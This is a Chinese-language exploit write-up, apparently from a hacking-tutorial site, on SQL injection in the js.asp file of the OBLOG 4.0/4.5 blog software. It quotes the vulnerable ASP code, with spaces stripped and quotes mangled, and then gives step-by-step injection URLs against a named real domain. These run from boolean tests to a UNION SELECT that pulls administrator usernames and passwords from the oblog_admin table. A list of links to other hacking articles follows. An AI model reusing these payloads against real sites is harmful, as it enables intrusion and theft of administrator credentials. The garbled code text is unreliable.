来源：DeepenStudy

漏洞文件：js.asp

<%

Dimoblog

setoblog=newclass_sys

oblog.autoupdate=False

oblog.start

dimjs_blogurl,n

js_blogurl=Trim(oblog.CacheConfig(3))

n=CInt(Request(”n”))

ifn=0thenn=1

selectcaseCInt(Request(”j”))

case1

calltongji()

case2

calltopuser()

case3

calladduser()

case4

calllistclass()

case5

callshowusertype()

case6

calllistbestblog()

case7

callshowlogin()

case8

callshowplace()

case9

callshowphoto()

case10

callshowblogstars()

Case11

Callshow_hotblog()

Case12

Callshow_teams()

Case13

Callshow_posts()

Case14

Callshow_hottag()

case0

callshowlog()

endselect

****************省略部分代码******************

Subshow_posts()

Dimteamid,postnum,l,u,t

teamid=Request(”tid”)

postnum=n

l=CInt(Request(”l”))

u=CInt(Request(”u”))

t=CInt(Request(”t”))

Dimrs,sql,sRet,sAddon

Sql=”selectTop”&postnum&”teamid,postid,topic,addtime,author,useridFromoblog_teampostWhereidepth=0andisdel=0”

Ifteamid<>“”Andteamid<>“0″Then

teamid=Replace(teamid,”|”,”,”)

Sql=Sql&”AndteamidIn(”&teamid&“)”

EndIf

Sql=Sql&”orderbypostidDesc”

Setrs=oblog.Execute(Sql)

sRet=”

”

DoWhileNotrs.Eof

sAddon=”"

*sRet=sRet&“”&oblog.Filt_html(Left(rs(2),l))&“”

Ifu=1ThensAddon=rs(4)

ift=1Then

IfsAddon<>“”ThensAddon=sAddon&“,”

sAddon=sAddon&rs(3)

EndIf

IfsAddon<>“”ThensAddon=”(”&sAddon&“)”

sRet=sRet&sAddon&“

”

rs.Movenext

Loop

Setrs=Nothing

sRet=sRet&“

”

Response.writeoblog.htm2js(sRet,True)

EndSub

调用show_posts()过程必须要符合上面的参数n=1,j=13

(”&teamid&“)

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=1返回正常

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=2返回异常

猜管理员表名

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and查询语句and(1=1

Sql=”selectTop”&postnum&”teamid,postid,topic,addtime,author,useridFromoblog_teampostWhereidepth=0andisdel=0”

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselect1,2,3,4,5,6fromoblog_adminwhereid=(1

document.write('

*

‘);

gid=1跟pid=2里的1,2就是了直接替换里面的1,2为username,password

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselectusername,password,3,4,5,6fromoblog_adminwhereid=(1

【OBLOG4.0 OBLOG4.5漏洞利用分析】相关文章：

★ 当菜鸟遇上黒客之三:QQ防盗篇

★ 如何追踪入侵者

★ 几款黑客工具的使用方法

★ 注册验证java代码[针对上篇文章]

★ 网络后门面面观

★ Serv-U得到管理员密码新招 (转)

★ 如何成为一名黑客全系列说明第1/2页

★ phpwind Exp 漏洞利用

★ XSS & SQL注入

★ 揭开面纱看看黑客用哪些工具(2)